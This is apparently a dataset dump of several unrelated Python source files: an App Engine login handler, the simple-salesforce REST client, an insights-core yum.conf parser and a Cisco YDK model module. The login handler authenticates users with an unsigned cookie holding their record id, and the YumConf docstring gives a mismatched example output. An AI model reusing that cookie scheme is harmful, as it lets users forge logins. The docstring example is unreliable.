\'\'\n\t\t#\t\tself.response.headers.add_header(\t\'Set-Cookie\', \n\t\t#\t\t\t\t\t\t\t\t\t\t\tcook_str\n\t\t#\t\t)\n\t\t#\t\tself.redirect(""/"")\n\t\t#\t\treturn\n\n\n\t\t#if section == \'sprofile\':\n\t\t#\tif not sessID:\n\t\t#\t\tself.redirect(""/signin/"")\n\t\t#\t\treturn\n\t\t\t#template_vars[\'welcome\'] = True if self.request.get(""welcome"") == \'1\' else False\n\t\t\t#template_vars[\'page_title\'] = \'My Profile\'\n\t\n\t\t\n\t\tmain_template = \'%s.html\' % (section)\n\t\tpath = \'/%s/\' % (section)\n\t\t#template_vars[\'path\'] = path\n\t\n\n\t\ttemplate_path = os.path.join(os.path.dirname(__file__), \'../templates/pages/%s\' % main_template)\n\t\tself.response.out.write(template.render(template_path, template_vars))\n\n\n\n\t###################################################################################################\n\t## Post 
Actions\n\t###################################################################################################\n\tdef post(self, page=None):\n\n\t\tif page == \'rpx\':\n\t\t\ttoken = self.request.get(\'token\')\n\t\t\turl = \'https://rpxnow.com/api/v2/auth_info\'\n\t\t\targs = {\n\t\t\t\t\'format\': \'json\',\n\t\t\t\t\'apiKey\': conf.RPX_API_KEY,\n\t\t\t\t\'token\': token\n\t\t\t}\n\n\t\t\tr = urlfetch.fetch(\turl=url,\n\t\t\t\t\t\t\t\tpayload=urllib.urlencode(args),\n\t\t\t\t\t\t\t\tmethod=urlfetch.POST,\n\t\t\t\t\t\t\t\theaders={\'Content-Type\':\'application/x-www-form-urlencoded\'}\n\t\t\t)\n\t\t\tdata = json.loads(r.content)\n\n\t\t\tif data[\'stat\'] == \'ok\': \n\t\t\t\twelcome = 0\n\t\t\t\tunique_identifier = data[\'profile\'][\'identifier\']\n\t\t\t\t\n\t\t\t\tq = db.GqlQuery(""select * from Crew where ident= :1"", unique_identifier)\n\t\t\t\tcrew = q.get()\n\t\t\t\tif not crew:\n\t\t\t\t\tcrew = Crew(ident=unique_identifier)\n\t\t\t\t\tcrew.name = data[\'profile\'][\'preferredUsername\']\n\t\t\t\t\tif data[\'profile\'].has_key(\'email\'):\n\t\t\t\t\t\tcrew.email = data[\'profile\'][\'email\']\n\t\t\t\t\tcrew.put()\n\t\t\t\t\twelcome = 1\n\t\t\t\t\tsubject = ""New Login: %s"" % crew.name\n\t\t\t\t\tbody = ""New login on schedule""\n\t\t\t\telse:\n\t\t\t\t\tsubject = ""Return Login: %s"" % crew.name\n\t\t\t\t\tbody = ""New login on schedule""\t\t\n\n\t\t\t\tsessID = str(crew.key())\n\t\t\t\tcook_str = \'crewID=%s; expires=Fri, 31-Dec-2020 23:59:59 GMT; Path=/;\'\t% crew.id()\n\t\t\t\tself.response.headers.add_header(\t\'Set-Cookie\', \n\t\t\t\t\t\t\t\t\t\t\t\t\tcook_str\n\t\t\t\t)\n\t\t\t\tmail.send_mail(\tsender = conf.EMAIL,\n\t\t\t\t\t\t\t\t\tto = ""Dev dummy@email.com"",\n\t\t\t\t\t\t\t\t\tsubject = subject,\n\t\t\t\t\t\t\t\t\tbody = body\n\t\t\t\t)\t\t\n\t\t\t\tself.redirect(""/profile/?welcome=%s"" % welcome)\n\t\t\t\treturn\t\n\t\telse:\n\t\t\tprint section, page\n\t\t#self.redirect(""/"")\n\t\t\t\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n', '""""""Core classes and exceptions for Simple-Salesforce""""""\n\n\n# has to be defined prior to login import\nDEFAULT_API_VERSION = \'29.0\'\n\n\nimport requests\nimport json\n\ntry:\n from urlparse import urlparse\nexcept ImportError:\n # Python 3+\n from urllib.parse import urlparse\nfrom simple_salesforce.login import SalesforceLogin\nfrom simple_salesforce.util import date_to_iso8601, SalesforceError\n\ntry:\n from collections import OrderedDict\nexcept ImportError:\n # Python < 2.7\n from ordereddict import OrderedDict\n\n\nclass Salesforce(object):\n """"""Salesforce Instance\n\n An instance of Salesforce is a handy way to wrap a Salesforce session\n for easy use of the Salesforce REST API.\n """"""\n def __init__(\n self, username=None, password=None, security_token=None,\n session_id=None, instance=None, instance_url=None,\n organizationId=None, sandbox=False, version=DEFAULT_API_VERSION,\n proxies=None, session=None):\n """"""Initialize the instance with the given parameters.\n\n Available kwargs\n\n Password Authentication:\n\n * username -- the Salesforce username to use for authentication\n * password -- the password for the username\n * security_token -- the security token for the username\n * sandbox -- True if you want to login to `test.salesforce.com`, False\n if you want to login to `login.salesforce.com`.\n\n Direct Session and Instance Access:\n\n * session_id -- Access token for this session\n\n Then either\n * instance -- Domain of your Salesforce instance, i.e. 
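# Illustrative sketch (hedged): the RPX `auth_info` exchange performed by the
# handler above, written with plain Python 2 urllib2 instead of App Engine's
# urlfetch. `api_key` stands in for conf.RPX_API_KEY.
import json
import urllib
import urllib2

def rpx_auth_info(token, api_key):
    """Return the RPX profile dict for a login token, or None on failure."""
    body = urllib.urlencode({'format': 'json', 'apiKey': api_key, 'token': token})
    response = urllib2.urlopen('https://rpxnow.com/api/v2/auth_info', body)
    data = json.loads(response.read())
    # RPX signals success with stat == 'ok'; the OpenID identifier is the
    # stable key used to look up or create a Crew record.
    if data.get('stat') == 'ok':
        return data['profile']
    return None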
`na1.salesforce.com`\n OR\n * instance_url -- Full URL of your instance i.e. `https://na1.salesforce.com\n\n Universal Kwargs:\n * version -- the version of the Salesforce API to use, for example `29.0`\n * proxies -- the optional map of scheme to proxy server\n * session -- Custom requests session, created in calling code. This\n enables the use of requets Session features not otherwise\n exposed by simple_salesforce.\n\n """"""\n\n # Determine if the user passed in the optional version and/or sandbox kwargs\n self.sf_version = version\n self.sandbox = sandbox\n self.proxies = proxies\n\n # Determine if the user wants to use our username/password auth or pass in their own information\n if all(arg is not None for arg in (username, password, security_token)):\n self.auth_type = ""password""\n\n # Pass along the username/password to our login helper\n self.session_id, self.sf_instance = SalesforceLogin(\n session=session,\n username=username,\n password=password,\n security_token=security_token,\n sandbox=self.sandbox,\n sf_version=self.sf_version,\n proxies=self.proxies)\n\n elif all(arg is not None for arg in (session_id, instance or instance_url)):\n self.auth_type = ""direct""\n self.session_id = session_id\n\n # If the user provides the full url (as returned by the OAuth interface for\n # example) extract the hostname (which we rely on)\n if instance_url is not None:\n self.sf_instance = urlparse(instance_url).hostname\n else:\n self.sf_instance = instance\n\n elif all(arg is not None for arg in (username, password, organizationId)):\n self.auth_type = \'ipfilter\'\n\n # Pass along the username/password to our login helper\n self.session_id, self.sf_instance = SalesforceLogin(\n session=session,\n username=username,\n password=password,\n organizationId=organizationId,\n sandbox=self.sandbox,\n sf_version=self.sf_version,\n proxies=self.proxies)\n\n else:\n raise TypeError(\n \'You must provide login information or an instance and token\'\n )\n\n if self.sandbox:\n self.auth_site = \'https://test.salesforce.com\'\n else:\n self.auth_site = \'https://login.salesforce.com\'\n\n self.request = session or requests.Session()\n self.request.proxies = self.proxies\n self.headers = {\n \'Content-Type\': \'application/json\',\n \'Authorization\': \'Bearer \' + self.session_id,\n \'X-PrettyPrint\': \'1\'\n }\n\n self.base_url = (\'https://{instance}/services/data/v{version}/\'\n .format(instance=self.sf_instance,\n version=self.sf_version))\n self.apex_url = (\'https://{instance}/services/apexrest/\'\n .format(instance=self.sf_instance))\n\n def describe(self):\n url = self.base_url + ""sobjects""\n result = self.request.get(url, headers=self.headers)\n if result.status_code != 200:\n raise SalesforceGeneralError(url,\n \'describe\',\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n # SObject Handler\n def __getattr__(self, name):\n """"""Returns an `SFType` instance for the given Salesforce object type\n (given in `name`).\n\n The magic part of the SalesforceAPI, this function translates\n calls such as `salesforce_api_instance.Lead.metadata()` into fully\n constituted `SFType` instances to make a nice Python API wrapper\n for the REST API.\n\n Arguments:\n\n * name -- the name of a Salesforce object type, e.g. 
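# Illustrative usage (hedged): the constructor above supports several auth
# styles; credentials here are placeholders, only the keyword names come
# from the documented kwargs.
import requests

# 1) username / password / security token (handled by SalesforceLogin)
sf = Salesforce(username='dummy@email.com', password='secret',
                security_token='TOKEN')

# 2) direct session access, e.g. with an OAuth access token
sf = Salesforce(session_id='ACCESS_TOKEN',
                instance_url='https://na1.salesforce.com',
                session=requests.Session())

print(sf.describe())   # lists the SObjects visible to this session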
Lead or Contact\n """"""\n \n # fix to enable serialization (https://github.com/heroku/simple-salesforce/issues/60)\n if name.startswith(\'__\'):\n return super(Salesforce, self).__getattr__(name)\n\n return SFType(name, self.session_id, self.sf_instance, self.sf_version, self.proxies)\n\n # User utlity methods\n def set_password(self, user, password):\n """"""Sets the password of a user\n\n salesforce dev documentation link:\n https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm\n\n Arguments:\n\n * user: the userID of the user to set\n * password: the new password\n """"""\n\n url = self.base_url + \'sobjects/User/%s/password\' % user\n params = { \'NewPassword\' : password, }\n\n result = self.request.post(url, headers=self.headers, data=json.dumps(params))\n\n # salesforce return 204 No Content when the request is successful\n if result.status_code != 200 and result.status_code != 204:\n raise SalesforceGeneralError(url,\n \'User\',\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n def setPassword(self, user, password):\n import warnings\n warnings.warn(\n ""This method has been deprecated. Please use set_password instread."", DeprecationWarning)\n return self.set_password(user, password)\n\n # Generic Rest Function\n def restful(self, path, params):\n """"""Allows you to make a direct REST call if you know the path\n\n Arguments:\n\n * path: The path of the request\n Example: sobjects/User/ABC123/password\'\n * params: dict of parameters to pass to the path\n """"""\n\n url = self.base_url + path\n result = self.request.get(url, headers=self.headers, params=params)\n if result.status_code != 200:\n raise SalesforceGeneralError(url,\n path,\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n # Search Functions\n def search(self, search):\n """"""Returns the result of a Salesforce search as a dict decoded from\n the Salesforce response JSON payload.\n\n Arguments:\n\n * search -- the fully formatted SOSL search string, e.g.\n `FIND {Waldo}`\n """"""\n url = self.base_url + \'search/\'\n\n # `requests` will correctly encode the query string passed as `params`\n params = {\'q\': search}\n result = self.request.get(url, headers=self.headers, params=params)\n if result.status_code != 200:\n raise SalesforceGeneralError(url,\n \'search\',\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n def quick_search(self, search):\n """"""Returns the result of a Salesforce search as a dict decoded from\n the Salesforce response JSON payload.\n\n Arguments:\n\n * search -- the non-SOSL search string, e.g. `Waldo`. 
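# Illustrative usage (hedged): the dynamic SObject access and search helpers
# above. `sf` is a logged-in Salesforce instance and the user Id is a
# placeholder.
lead_meta = sf.Lead.metadata()        # __getattr__ builds SFType('Lead', ...)
results = sf.search('FIND {Waldo}')   # full SOSL string
same = sf.quick_search('Waldo')       # wrapped to FIND {Waldo} internally
sf.set_password('005xx000001Sv6e', 'new-password')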
This search\n string will be wrapped to read `FIND {Waldo}` before being\n sent to Salesforce\n """"""\n search_string = u\'FIND {{{search_string}}}\'.format(search_string=search)\n return self.search(search_string)\n\n # Query Handler\n def query(self, query, **kwargs):\n """"""Return the result of a Salesforce SOQL query as a dict decoded from\n the Salesforce response JSON payload.\n\n Arguments:\n\n * query -- the SOQL query to send to Salesforce, e.g.\n `SELECT Id FROM Lead WHERE Email = dummy@email.com""`\n """"""\n url = self.base_url + \'query/\'\n params = {\'q\': query}\n # `requests` will correctly encode the query string passed as `params`\n result = self.request.get(url, headers=self.headers, params=params, **kwargs)\n\n if result.status_code != 200:\n _exception_handler(result)\n\n return result.json(object_pairs_hook=OrderedDict)\n\n def query_more(self, next_records_identifier, identifier_is_url=False, **kwargs):\n """"""Retrieves more results from a query that returned more results\n than the batch maximum. Returns a dict decoded from the Salesforce\n response JSON payload.\n\n Arguments:\n\n * next_records_identifier -- either the Id of the next Salesforce\n object in the result, or a URL to the\n next record in the result.\n * identifier_is_url -- True if `next_records_identifier` should be\n treated as a URL, False if\n `next_records_identifer` should be treated as\n an Id.\n """"""\n if identifier_is_url:\n # Don\'t use `self.base_url` here because the full URI is provided\n url = (u\'https://{instance}{next_record_url}\'\n .format(instance=self.sf_instance,\n next_record_url=next_records_identifier))\n else:\n url = self.base_url + \'query/{next_record_id}\'\n url = url.format(next_record_id=next_records_identifier)\n result = self.request.get(url, headers=self.headers, **kwargs)\n\n if result.status_code != 200:\n _exception_handler(result)\n\n return result.json(object_pairs_hook=OrderedDict)\n\n def query_all(self, query, **kwargs):\n """"""Returns the full set of results for the `query`. 
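# Illustrative usage (hedged): query_more() accepts either the bare
# identifier or the full `nextRecordsUrl` returned by the previous batch;
# both forms below are equivalent (the bare identifier is illustrative).
batch = sf.query("SELECT Id FROM Lead")
if not batch['done']:
    nxt = sf.query_more(batch['nextRecordsUrl'], identifier_is_url=True)
    # or: nxt = sf.query_more('01gD0000002HU6KIAW-2000')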
This is a\n convenience wrapper around `query(...)` and `query_more(...)`.\n\n The returned dict is the decoded JSON payload from the final call to\n Salesforce, but with the `totalSize` field representing the full\n number of results retrieved and the `records` list representing the\n full list of records retrieved.\n\n Arguments\n\n * query -- the SOQL query to send to Salesforce, e.g.\n `SELECT Id FROM Lead WHERE Email = dummy@email.com""`\n """"""\n def get_all_results(previous_result, **kwargs):\n """"""Inner function for recursing until there are no more results.\n\n Returns the full set of results that will be the return value for\n `query_all(...)`\n\n Arguments:\n\n * previous_result -- the modified result of previous calls to\n Salesforce for this query\n """"""\n if previous_result[\'done\']:\n return previous_result\n else:\n result = self.query_more(previous_result[\'nextRecordsUrl\'],\n identifier_is_url=True, **kwargs)\n result[\'totalSize\'] += previous_result[\'totalSize\']\n # Include the new list of records with the previous list\n previous_result[\'records\'].extend(result[\'records\'])\n result[\'records\'] = previous_result[\'records\']\n # Continue the recursion\n return get_all_results(result, **kwargs)\n\n # Make the initial query to Salesforce\n result = self.query(query, **kwargs)\n # The number of results might have exceeded the Salesforce batch limit\n # so check whether there are more results and retrieve them if so.\n return get_all_results(result, **kwargs)\n\n def apexecute(self, action, method=\'GET\', data=None, **kwargs):\n """"""Makes an HTTP request to an APEX REST endpoint\n\n Arguments:\n\n * action -- The REST endpoint for the request.\n * method -- HTTP method for the request (default GET)\n * data -- A dict of parameters to send in a POST / PUT request\n * kwargs -- Additional kwargs to pass to `requests.request`\n """"""\n result = self._call_salesforce(method, self.apex_url + action,\n data=json.dumps(data), **kwargs)\n\n if result.status_code == 200:\n try:\n response_content = result.json()\n except Exception:\n response_content = result.text\n return response_content\n\n def _call_salesforce(self, method, url, **kwargs):\n """"""Utility method for performing HTTP call to Salesforce.\n\n Returns a `requests.result` object.\n """"""\n result = self.request.request(method, url, headers=self.headers, **kwargs)\n\n if result.status_code >= 300:\n _exception_handler(result)\n\n return result\n\n\nclass SFType(object):\n """"""An interface to a specific type of SObject""""""\n\n def __init__(self, object_name, session_id, sf_instance, sf_version=\'27.0\', proxies=None):\n """"""Initialize the instance with the given parameters.\n\n Arguments:\n\n * object_name -- the name of the type of SObject this represents,\n e.g. 
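# Illustrative alternative (hedged, not the library's API): get_all_results()
# above recurses once per extra batch; an equivalent iterative sketch avoids
# any chance of exhausting Python's recursion limit on very large result sets.
def query_all_iterative(sf, query, **kwargs):
    result = sf.query(query, **kwargs)
    records = result['records']
    while not result['done']:
        result = sf.query_more(result['nextRecordsUrl'],
                               identifier_is_url=True, **kwargs)
        records.extend(result['records'])
    result['records'] = records
    result['totalSize'] = len(records)
    return result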
`Lead` or `Contact`\n * session_id -- the session ID for authenticating to Salesforce\n * sf_instance -- the domain of the instance of Salesforce to use\n * sf_version -- the version of the Salesforce API to use\n * proxies -- the optional map of scheme to proxy server\n """"""\n self.session_id = session_id\n self.name = object_name\n self.request = requests.Session()\n self.request.proxies = proxies\n\n self.base_url = (u\'https://{instance}/services/data/v{sf_version}/sobjects/{object_name}/\'\n .format(instance=sf_instance,\n object_name=object_name,\n sf_version=sf_version))\n\n def metadata(self):\n """"""Returns the result of a GET to `.../{object_name}/` as a dict\n decoded from the JSON payload returned by Salesforce.\n """"""\n result = self._call_salesforce(\'GET\', self.base_url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def describe(self):\n """"""Returns the result of a GET to `.../{object_name}/describe` as a\n dict decoded from the JSON payload returned by Salesforce.\n """"""\n result = self._call_salesforce(\'GET\', self.base_url + \'describe\')\n return result.json(object_pairs_hook=OrderedDict)\n\n def describe_layout(self, record_id):\n """"""Returns the result of a GET to `.../{object_name}/describe/layouts/` as a\n dict decoded from the JSON payload returned by Salesforce.\n """"""\n result = self._call_salesforce(\'GET\', self.base_url + \'describe/layouts/\' + record_id)\n return result.json(object_pairs_hook=OrderedDict)\n\n def get(self, record_id):\n """"""Returns the result of a GET to `.../{object_name}/{record_id}` as a\n dict decoded from the JSON payload returned by Salesforce.\n\n Arguments:\n\n * record_id -- the Id of the SObject to get\n """"""\n result = self._call_salesforce(\'GET\', self.base_url + record_id)\n return result.json(object_pairs_hook=OrderedDict)\n\n def get_by_custom_id(self, custom_id_field, custom_id):\n """"""Returns the result of a GET to `.../{object_name}/{custom_id_field}/{custom_id}` as a\n dict decoded from the JSON payload returned by Salesforce.\n\n Arguments:\n\n * custom_id_field -- the API name of a custom field that was defined as an External ID\n * custom_id - the External ID value of the SObject to get\n """"""\n custom_url = self.base_url + \'{custom_id_field}/{custom_id}\'.format(\n custom_id_field=custom_id_field, custom_id=custom_id)\n result = self._call_salesforce(\'GET\', custom_url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def create(self, data):\n """"""Creates a new SObject using a POST to `.../{object_name}/`.\n\n Returns a dict decoded from the JSON payload returned by Salesforce.\n\n Arguments:\n\n * data -- a dict of the data to create the SObject from. It will be\n JSON-encoded before being transmitted.\n """"""\n result = self._call_salesforce(\'POST\', self.base_url,\n data=json.dumps(data))\n return result.json(object_pairs_hook=OrderedDict)\n\n def upsert(self, record_id, data, raw_response=False):\n """"""Creates or updates an SObject using a PATCH to\n `.../{object_name}/{record_id}`.\n\n If `raw_response` is false (the default), returns the status code\n returned by Salesforce. Otherwise, return the `requests.Response`\n object.\n\n Arguments:\n\n * record_id -- an identifier for the SObject as described in the\n Salesforce documentation\n * data -- a dict of the data to create or update the SObject from. 
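# Illustrative usage (hedged): CRUD sketch against the SFType helpers above.
# Object and field names are illustrative; `sf` is a logged-in Salesforce
# instance.
contact = sf.Contact.create({'LastName': 'Smith',
                             'Email': 'dummy@email.com'})
record = sf.Contact.get(contact['id'])
# upsert keys on an External ID field, i.e. '{custom_id_field}/{custom_id}':
status = sf.Contact.upsert('AccountNumber__c/12345', {'LastName': 'Jones'})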
It\n will be JSON-encoded before being transmitted.\n * raw_response -- a boolean indicating whether to return the response\n directly, instead of the status code.\n """"""\n result = self._call_salesforce(\'PATCH\', self.base_url + record_id,\n data=json.dumps(data))\n return self._raw_response(result, raw_response)\n\n def update(self, record_id, data, raw_response=False):\n """"""Updates an SObject using a PATCH to\n `.../{object_name}/{record_id}`.\n\n If `raw_response` is false (the default), returns the status code\n returned by Salesforce. Otherwise, return the `requests.Response`\n object.\n\n Arguments:\n\n * record_id -- the Id of the SObject to update\n * data -- a dict of the data to update the SObject from. It will be\n JSON-encoded before being transmitted.\n * raw_response -- a boolean indicating whether to return the response\n directly, instead of the status code.\n """"""\n result = self._call_salesforce(\'PATCH\', self.base_url + record_id,\n data=json.dumps(data))\n return self._raw_response(result, raw_response)\n\n def delete(self, record_id, raw_response=False):\n """"""Deletes an SObject using a DELETE to\n `.../{object_name}/{record_id}`.\n\n If `raw_response` is false (the default), returns the status code\n returned by Salesforce. Otherwise, return the `requests.Response`\n object.\n\n Arguments:\n\n * record_id -- the Id of the SObject to delete\n * raw_response -- a boolean indicating whether to return the response\n directly, instead of the status code.\n """"""\n result = self._call_salesforce(\'DELETE\', self.base_url + record_id)\n return self._raw_response(result, raw_response)\n\n def deleted(self, start, end):\n """"""Use the SObject Get Deleted resource to get a list of deleted records for the specified object.\n .../deleted/?start=2013-05-05T00:00:00+00:00&end=2013-05-10T00:00:00+00:00\n\n * start -- start datetime object\n * end -- end datetime object\n """"""\n url = self.base_url + \'deleted/?start={start}&end={end}\'.format(\n start=date_to_iso8601(start), end=date_to_iso8601(end))\n result = self._call_salesforce(\'GET\', url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def updated(self, start, end):\n """"""Use the SObject Get Updated resource to get a list of updated (modified or added)\n records for the specified object.\n\n .../updated/?start=2014-03-20T00:00:00+00:00&end=2014-03-22T00:00:00+00:00\n\n * start -- start datetime object\n * end -- end datetime object\n """"""\n url = self.base_url + \'updated/?start={start}&end={end}\'.format(\n start=date_to_iso8601(start), end=date_to_iso8601(end))\n result = self._call_salesforce(\'GET\', url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def _call_salesforce(self, method, url, **kwargs):\n """"""Utility method for performing HTTP call to Salesforce.\n\n Returns a `requests.result` object.\n """"""\n headers = {\n \'Content-Type\': \'application/json\',\n \'Authorization\': \'Bearer \' + self.session_id,\n \'X-PrettyPrint\': \'1\'\n }\n result = self.request.request(method, url, headers=headers, **kwargs)\n\n if result.status_code >= 300:\n _exception_handler(result, self.name)\n\n return result\n\n def _raw_response(self, response, body_flag):\n """"""Utility method for processing the response and returning either the\n status code or the response object.\n\n Returns either an `int` or a `requests.Response` object.\n """"""\n if not body_flag:\n return response.status_code\n else:\n return response\n\n\nclass SalesforceAPI(Salesforce):\n """"""Depreciated SalesforceAPI 
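# Illustrative usage (hedged): deleted()/updated() take datetime objects,
# which date_to_iso8601 formats into the start/end query parameters; naive
# UTC datetimes are assumed acceptable here.
import datetime

end = datetime.datetime.utcnow()
start = end - datetime.timedelta(days=5)
removed = sf.Lead.deleted(start, end)   # records deleted in the window
changed = sf.Lead.updated(start, end)   # records added or modified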
Instance\n\n This class implements the Username/Password Authentication Mechanism using Arguments\n It has since been surpassed by the \'Salesforce\' class, which relies on kwargs\n\n """"""\n def __init__(self, username, password, security_token, sandbox=False,\n sf_version=\'27.0\'):\n """"""Initialize the instance with the given parameters.\n\n Arguments:\n\n * username -- the Salesforce username to use for authentication\n * password -- the password for the username\n * security_token -- the security token for the username\n * sandbox -- True if you want to login to `test.salesforce.com`, False\n if you want to login to `login.salesforce.com`.\n * sf_version -- the version of the Salesforce API to use, for example\n ""27.0""\n """"""\n import warnings\n warnings.warn(\n ""Use of login arguments has been depreciated. Please use kwargs"",\n DeprecationWarning\n )\n\n super(SalesforceAPI, self).__init__(username=username,\n password=password,\n security_token=security_token,\n sandbox=sandbox,\n version=sf_version)\n\n\ndef _exception_handler(result, name=""""):\n """"""Exception router. Determines which error to raise for bad results""""""\n try:\n response_content = result.json()\n except Exception:\n response_content = result.text\n\n exc_map = {\n 300: SalesforceMoreThanOneRecord,\n 400: SalesforceMalformedRequest,\n 401: SalesforceExpiredSession,\n 403: SalesforceRefusedRequest,\n 404: SalesforceResourceNotFound,\n }\n exc_cls = exc_map.get(result.status_code, SalesforceGeneralError)\n\n raise exc_cls(result.url, result.status_code, name, response_content)\n\n\nclass SalesforceMoreThanOneRecord(SalesforceError):\n """"""\n Error Code: 300\n The value returned when an external ID exists in more than one record. The\n response body contains the list of matching records.\n """"""\n message = u""More than one record for {url}. Response content: {content}""\n\n\nclass SalesforceMalformedRequest(SalesforceError):\n """"""\n Error Code: 400\n The request couldn\'t be understood, usually becaue the JSON or XML body contains an error.\n """"""\n message = u""Malformed request {url}. Response content: {content}""\n\n\nclass SalesforceExpiredSession(SalesforceError):\n """"""\n Error Code: 401\n The session ID or OAuth token used has expired or is invalid. The response\n body contains the message and errorCode.\n """"""\n message = u""Expired session for {url}. Response content: {content}""\n\n\nclass SalesforceRefusedRequest(SalesforceError):\n """"""\n Error Code: 403\n The request has been refused. Verify that the logged-in user has\n appropriate permissions.\n """"""\n message = u""Request refused for {url}. Response content: {content}""\n\n\nclass SalesforceResourceNotFound(SalesforceError):\n """"""\n Error Code: 404\n The requested resource couldn\'t be found. Check the URI for errors, and\n verify that there are no sharing issues.\n """"""\n message = u\'Resource {name} Not Found. Response content: {content}\'\n\n def __str__(self):\n return self.message.format(name=self.resource_name,\n content=self.content)\n\n\nclass SalesforceGeneralError(SalesforceError):\n """"""\n A non-specific Salesforce error.\n """"""\n message = u\'Error Code {status}. Response content: {content}\'\n\n def __str__(self):\n return self.message.format(status=self.status, content=self.content)\n', '""""""\nYumConf - file ``/etc/yum.conf``\n================================\n\nThis module provides parsing for the ``/etc/yum.conf`` file.\nThe ``YumConf`` class parses the information in the file\n``/etc/yum.conf``. 
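# Illustrative usage (hedged): _exception_handler() maps status codes to the
# exception classes below, so callers can branch on the failure mode.
try:
    sf.query("SELECT Id FROM NoSuchObject__c")
except SalesforceMalformedRequest as e:   # 400: bad SOQL or unknown object
    print(e)
except SalesforceExpiredSession:          # 401: session_id needs refreshing
    raise
except SalesforceGeneralError as e:       # any other status >= 300
    print(e)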
See the ``IniConfigFile`` class for more\ninformation on attributes and methods.\n\nSample input data looks like::\n\n [main]\n\n cachedir=/var/cache/yum/$basearch/$releasever\n keepcache=0\n debuglevel=2\n logfile=/var/log/yum.log\n exactarch=1\n obsoletes=1\n gpgcheck=1\n plugins=1\n installonly_limit=3\n\n [rhel-7-server-rpms]\n\n metadata_expire = 86400\n baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch\n name = Red Hat Enterprise Linux 7 Server (RPMs)\n gpgkey = PI:KEY\n enabled = 1\n gpgcheck = 1\n\nExamples:\n\n >>> yconf = shared[YumConf]\n >>> yconf.defaults()\n {\'admin_token\': \'ADMIN\', \'compute_port\': \'8774\'}\n >>> \'main\' in yconf\n True\n >>> \'rhel-7-server-rpms\' in yconf\n True\n >>> yconf.has_option(\'main\', \'gpgcheck\')\n True\n >>> yconf.has_option(\'main\', \'foo\')\n False\n >>> yconf.get(\'rhel-7-server-rpms\', \'enabled\')\n \'1\'\n >>> yconf.items(\'main\')\n {\'plugins\': \'1\',\n \'keepcache\': \'0\',\n \'cachedir\': \'/var/cache/yum/$basearch/$releasever\',\n \'exactarch\': \'1\',\n \'obsoletes\': \'1\',\n \'installonly_limit\': \'3\',\n \'debuglevel\': \'2\',\n \'gpgcheck\': \'1\',\n \'logfile\': \'/var/log/yum.log\'}\n""""""\n\nfrom insights.contrib.ConfigParser import NoOptionError\nfrom .. import parser, IniConfigFile\nfrom insights.specs import yum_conf\n\n\n@parser(yum_conf)\nclass YumConf(IniConfigFile):\n """"""Parse contents of file ``/etc/yum.conf``.""""""\n def parse_content(self, content):\n super(YumConf, self).parse_content(content)\n # File /etc/yum.conf may contain repos definitions.\n # Keywords \'gpgkey\' and \'baseurl\' might contain multiple\n # values separated by comma. Convert those values into a list.\n for section in self.sections():\n for key in (\'gpgkey\', \'baseurl\'):\n try:\n value = self.get(section, key)\n if value and isinstance(value, str):\n self.data.set(section, key, value.split(\',\'))\n except NoOptionError:\n pass\n', '"""""" Cisco_IOS_XR_man_xml_ttyagent_oper \n\nThis module contains a collection of YANG definitions\nfor Cisco IOS\\-XR man\\-xml\\-ttyagent package operational data.\n\nThis module contains definitions\nfor the following management objects\\:\n netconf\\: NETCONF operational information\n xr\\-xml\\: xr xml\n\nCopyright (c) 2013\\-2016 by Cisco Systems, Inc.\nAll rights reserved.\n\n""""""\n\n\nimport re\nimport collections\n\nfrom enum import Enum\n\nfrom ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict\n\nfrom ydk.errors import YPYError, YPYModelError\n\n\n\nclass XrXmlSessionAlarmRegisterEnum(Enum):\n """"""\n XrXmlSessionAlarmRegisterEnum\n\n AlarmNotify\n\n .. data:: registered = 1\n\n \tRegistered\n\n .. data:: not_registered = 2\n\n \tNotRegistered\n\n """"""\n\n registered = 1\n\n not_registered = 2\n\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXmlSessionAlarmRegisterEnum\']\n\n\nclass XrXmlSessionStateEnum(Enum):\n """"""\n XrXmlSessionStateEnum\n\n SessionState\n\n .. data:: idle = 1\n\n \tIdle\n\n .. data:: busy = 2\n\n \tBusy\n\n """"""\n\n idle = 1\n\n busy = 2\n\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXmlSessionStateEnum\']\n\n\n\nclass Netconf(object):\n """"""\n NETCONF operational information\n \n .. 
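# Illustrative usage (hedged): the comma-splitting behaviour implemented in
# parse_content() means 'gpgkey' and 'baseurl' come back as lists, while all
# other options stay strings.
yconf = shared[YumConf]                      # as in the docstring examples
baseurl = yconf.get('rhel-7-server-rpms', 'baseurl')
assert isinstance(baseurl, list)             # even a single URL is wrapped
assert yconf.get('rhel-7-server-rpms', 'enabled') == '1'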
